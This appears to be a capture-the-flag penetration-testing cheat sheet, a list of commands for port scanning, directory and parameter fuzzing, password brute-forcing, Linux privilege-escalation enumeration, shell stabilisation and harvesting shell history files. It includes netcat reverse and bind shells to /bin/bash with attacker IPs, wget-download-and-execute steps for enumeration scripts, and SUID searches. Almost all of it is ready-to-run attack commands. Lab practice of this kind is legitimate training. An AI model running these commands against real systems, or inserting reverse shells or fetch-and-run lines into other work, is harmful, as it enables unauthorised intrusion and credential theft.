ctf flag CTF outside ping ping -c 10 $(target) | tee ping.txt
curl curl --head $(target)
nmap nmap -p- -oA nmap_fast $(target)
nmap -p- -sV -sC -oA nmap_full $(target)
enum4linux enum4linux $(target)
feroxbuster feroxbuster --url http://$(target)/ -o feroxbuster_80.txt -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster gobuster dir --url $(target) --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
autorecon autorecon 10.10.99.99
wfuzz # === fuzz directories
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 "$URL/FUZZ"
# === fuzz files
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL/FUZZ"
# === fuzz parameters
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 302,404 "$URL?FUZZ"
# === fuzz users
wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL?user=FUZZ"
FFUF GET & POST ffuf -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -X POST -d '{"key":"value"}' -u http://$(target):8081/api/FUZZ -fw 2
inside sudo -l sudo -l
cron cat /etc/crontab
# - check scripts that are executed as root - can you edit them
# - check PATH, can you create script that will be executed instead of intended one ?
find find <directory-location> -user <username> -name <file-name>
find <directory-location> -group <group-name> -name <file-name>
find <directory-location> -executable -group <group-name>
linpeas.sh wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinEnum.sh wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
lse.sh wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh
chmod +x lse.sh
./lse.sh
linux exploit suggester 2 wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl
python local server python3 -m http.server
scp scp -i id_rsa /home/kali/workspace/exploit/45010 barry@10.10.230.234:/home/barry/
spawning shells python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
netcat nc shell ATTACKER: netcat -lvnp 4444
TARGET: netcat 10.18.9.175 4444 -e /bin/bash
--
TARGET: netcat -lvp 4444 -e /bin/bash
ATTACKER: netcat 10.10.161.83 4444
SUID, SGID and Sticky Bits find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
History history
cat ~/.bash_history | less
cat ~/.mysql_history | less
cat ~/.nano_history | less
cat ~/.*history | less
links